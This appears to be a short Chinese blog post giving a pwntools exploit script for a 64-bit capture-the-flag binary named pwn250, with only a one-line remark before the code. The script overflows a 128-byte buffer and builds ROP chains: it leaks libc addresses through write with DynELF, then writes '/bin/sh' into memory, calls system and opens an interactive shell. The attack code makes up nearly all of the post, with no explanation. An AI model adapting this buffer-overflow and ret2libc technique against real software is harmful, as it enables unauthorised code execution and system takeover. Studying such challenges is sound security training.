注:一个64位有read和write的能看见flag的题(自己和胜利只差一个exp)
EXP
from pwn import*
p =process('./pwn250')
elf = ELF('./pwn250')
pop3_addr = 0x40056a
write_plt_addr = elf.plt['write']
start_addr = 0x0400470
where_bin_sh_addr = 0x601070
pop1_addr = 0x400633
def leak(addr):
payload = 'A'*128 +p64(0)
payload += p64(pop3_addr)
payload += p64(1)
payload += p64(addr)
payload += p64(8)
payload += p64(write_plt_addr)
payload += p64(start_addr)
p.send(payload)
content = p.recv()[:4]
print ("%#x -> %s"%(addr,(content or '').encode('hex')))
return content
d =DynELF(leak, elf = elf)
system_addr = d.lookup('system','libc')
read_addr = d.lookup('read','libc')
log.info("[+]system_addr = %#x",system_addr)
log.info("[+]read_addr = %#x",read_addr)
payload = 'A'*128
payload += p64(0)
payload += p64(pop3_addr)
payload += p64(0)
payload += p64(where_bin_sh_addr)
payload += p64(8)
payload += p64(read_addr)
payload += p64(pop1_addr)
payload += p64(where_bin_sh_addr)
payload += p64(system_addr)
p.sendline(payload)
sleep(0.1)
p.sendline('/bin/sh\x00')
p.interactive()
网友评论